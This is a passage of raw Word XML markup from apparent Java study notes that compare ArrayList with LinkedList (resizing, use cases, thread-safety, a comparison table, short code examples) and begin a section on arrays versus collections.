      </w:r>
    </w:p>
    <w:p w14:paraId="4F0B43A4" w14:textId="77777777" w:rsidR="00EC6922" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0034424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768414">
          <v:rect id="_x0000_i1422" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2ED38D" w14:textId="77777777" w:rsidR="00EC6922" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC6922"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Resizing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6576B46B" w14:textId="77777777" w:rsidR="00EC6922" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC6922" w:rsidP="00344244">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F451CD" w14:textId="77777777" w:rsidR="00EC6922" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC6922" w:rsidP="00344244">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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ynamic Resizing</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When the array is full, the ArrayList dynamically increases the array size (usually by 50% or 100%) and copies the elements to the new array. This resizing operation can be expensive in terms of time complexity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F2F2A6" w14:textId="77777777" w:rsidR="00EC6922" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC6922" w:rsidP="00344244">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B53A796" w14:textId="77777777" w:rsidR="00EC6922" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC6922" w:rsidP="00344244">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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Resizing</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: LinkedLists do not require resizing since they allocate memory dynamically for each new element.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53512B2A" w14:textId="77777777" w:rsidR="00EC6922" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0034424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3B5E682">
          <v:rect id="_x0000_i1423" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF1C5E5" w14:textId="77777777" w:rsidR="00EC6922" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC6922"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Use Cases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3541C1A7" w14:textId="77777777" w:rsidR="00EC6922" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC6922" w:rsidP="00344244">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36AEE708" w14:textId="77777777" w:rsidR="00EC6922" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC6922" w:rsidP="00344244">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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st for Random Access</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If your program requires frequent access to elements by index and does not modify the list much (e.g., only adding/removing elements at the end), ArrayList is a better choice.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE1DCB2" w14:textId="77777777" w:rsidR="00EC6922" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC6922" w:rsidP="00344244">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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st for Fixed-Size Operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If the list size is mostly fixed and you only need occasional modifications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DC7ABE" w14:textId="77777777" w:rsidR="00EC6922" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC6922" w:rsidP="00344244">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5DC262" w14:textId="77777777" w:rsidR="00EC6922" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC6922" w:rsidP="00344244">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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st for Frequent Insertions/Deletions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If your program involves frequent insertions or deletions, particularly in the middle or at the start of the list, LinkedList is a better choice because it does not require shifting elements like ArrayList.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F71102" w14:textId="77777777" w:rsidR="00EC6922" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0034424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458CACB">
          <v:rect id="_x0000_i1424" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="66542050" w14:textId="77777777" w:rsidR="00EC6922" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC6922"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7. Thread-Safety:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44688BCE" w14:textId="77777777" w:rsidR="00EC6922" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC6922" w:rsidP="00344244">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65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oth ArrayList and LinkedList are </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not thread-safe</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. If you need to use them in a multi-threaded environment, you should either use synchronization or use alternatives like CopyOnWriteArrayList.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C84981" w14:textId="77777777" w:rsidR="00EC6922" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0034424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D687EC0">
          <v:rect id="_x0000_i1425" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B8DABE" w14:textId="77777777" w:rsidR="00EC6922" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC6922"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Quick Comparis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4"/>
        <w:gridCol w:w="3568"/>
        <w:gridCol w:w="4682"/>
      </w:tblGrid>
      <w:tr w:rsidR="00344244" w:rsidRPr="00CE4B95" w14:paraId="3842BFE6" w14:textId="77777777" w:rsidTr="00EC6922">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="35AC6EAF" w14:textId="77777777" w:rsidR="00EC6922" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC6922"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331F0A3D" w14:textId="77777777" w:rsidR="00EC6922" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC6922"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rrayList</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="48D897C2" w14:textId="77777777" w:rsidR="00EC6922" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC6922"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LinkedList</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00344244" w:rsidRPr="00CE4B95" w14:paraId="077D151E" w14:textId="77777777" w:rsidTr="00EC6922">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="73C8ACE6"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ata Structure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="749DE54B"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ynamic Array</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="68726442"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oubly Linked List</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00344244" w:rsidRPr="00CE4B95" w14:paraId="6DDFF58F" w14:textId="77777777" w:rsidTr="00EC6922">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="649FCAE8"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Access Time (get/set)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61380A29"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1) (Random Access)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3DEAA59B"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 (Sequential Access)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00344244" w:rsidRPr="00CE4B95" w14:paraId="37E8A3E7" w14:textId="77777777" w:rsidTr="00EC6922">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="43DC6F60"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on/Deletion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7AA99C99"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 (Shifting elements)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="57E99AE8"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1) (at start/end) but O(n) to find</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00344244" w:rsidRPr="00CE4B95" w14:paraId="286F6A4B" w14:textId="77777777" w:rsidTr="00EC6922">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72E4A4CA"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Usage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4892CB59"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ess (only data)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="428FF9D0"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re (due to additional references)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00344244" w:rsidRPr="00CE4B95" w14:paraId="14E1CD75" w14:textId="77777777" w:rsidTr="00EC6922">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="554D8EE5"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izing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B6FC441"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ray needs resizing (costly)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="29C8BC05"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resizing needed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00344244" w:rsidRPr="00CE4B95" w14:paraId="7C37A8BD" w14:textId="77777777" w:rsidTr="00EC6922">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3593B97A"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st For</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F3F4B18"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andom access, frequent access by index</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3A30C663"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requent insertion/deletion, no need for random access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00344244" w:rsidRPr="00CE4B95" w14:paraId="22B7B9A0" w14:textId="77777777" w:rsidTr="00EC6922">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E51669F"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 Use Cases</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13DAEDA8"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oring large datasets, accessing elements by index</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="50DBFE4D"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lementing queues, stacks, and other dynamic data structures</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7D58E6F1" w14:textId="77777777" w:rsidR="00EC6922" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0034424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CD35DA6">
          <v:rect id="_x0000_i1426" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A0B81D" w14:textId="77777777" w:rsidR="00EC6922" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC6922"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de Examples:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC42772" w14:textId="77777777" w:rsidR="00EC6922" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC6922"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rrayList Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762A245E"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List;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C20FFA" w14:textId="77777777" w:rsidR="00EC6922" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC6922" w:rsidP="00344244">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34EBBDF7"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ArrayListExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E385E5"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7D9481DF"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rrayList&lt;String&gt; list = new ArrayList&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4547467E"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Apple");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A681AA0"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Banana");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D25792"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Cherry");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E766803"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F810B1E"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list.get(1)); // Output: Banana (O(1) access)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64943113"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42B8211"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remove(1);  // Removing element (O(n) due to shifting)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342989B0"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list);  // Output: [Apple, Cherry]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3893F1AA"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EAAE099"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C771F42" w14:textId="77777777" w:rsidR="00EC6922" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC6922"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LinkedList Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F6DA01"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nkedList;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39162697" w14:textId="77777777" w:rsidR="00EC6922" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC6922" w:rsidP="00344244">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21D33A9C"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LinkedListExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7C3EA6"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1C7C4731"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nkedList&lt;String&gt; list = new LinkedList&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C3D0F4"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Apple");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01341CA7"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Banana");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473BD762"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Cherry");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC2A497"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F311FEE"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list.get(1)); // Output: Banana (O(n) access)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA2B697"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F43A37B"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remove(1);  // Removing element (O(1) removal if we have the reference)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E3A3B6"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list);  // Output: [Apple, Cherry]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180C6B0A"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F732405" w14:textId="77777777" w:rsidR="00EC6922" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC6922" w:rsidP="0034424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E2D4CBB" w14:textId="77777777" w:rsidR="00EC6922" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC6922" w:rsidP="0034424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7AE5569B" w14:textId="77777777" w:rsidR="00EC6922" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC6922" w:rsidP="00344244">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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ArrayList</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When you need fast access to elements by index, or if the list will mostly grow by adding elements at the end.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B386CBF" w14:textId="77777777" w:rsidR="00EC6922" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC6922" w:rsidP="00344244">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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LinkedList</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When your application involves frequent insertions and deletions, particularly at the start or middle of the list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB0BFB7" w14:textId="08F99C93" w:rsidR="00EC6922" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00EC692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4909039">
          <v:rect id="_x0000_i1427" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5A209A" w14:textId="77777777" w:rsidR="002B6B72" w:rsidRPr="00CE4B95" w:rsidRDefault="002B6B72">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="136" w:name="_Toc196307616"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between Array and Collections?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="136"/>
    </w:p>
    <w:p w14:paraId="5D6A5E19" w14:textId="4373092B" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00D73299" w:rsidP="00D53FA0">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both </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>array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collections</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are used to store multiple values, but they differ in terms of functionality, flexibility, and features. Below is a detailed comparison between arrays and collections:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A8CF41" w14:textId="77777777" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00D53FA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F55DF9">
          <v:rect id="_x0000_i1428" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B23D936" w14:textId="77777777" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00D73299" w:rsidP="00D53FA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1. Definition:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5950DC56" w14:textId="77777777" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00D73299" w:rsidP="00D53FA0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E21A27E" w14:textId="77777777" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00D73299" w:rsidP="00D53FA0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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n </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>array</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a fixed-size data structure that holds elements of the same type (primitive or object).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6367AF" w14:textId="77777777" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00D73299" w:rsidP="00D53FA0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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ce created, the size of the array cannot be changed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8D68FB" w14:textId="77777777" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00D73299" w:rsidP="00D53FA0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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llections</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F015F2B" w14:textId="77777777" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00D73299" w:rsidP="00D53FA0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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llections</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are part of the Java Collections Framework (JCF) and are dynamic data structures that store a group of objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12ACC360" w14:textId="77777777" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00D73299" w:rsidP="00D53FA0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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ollections are more flexible and offer various types like </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
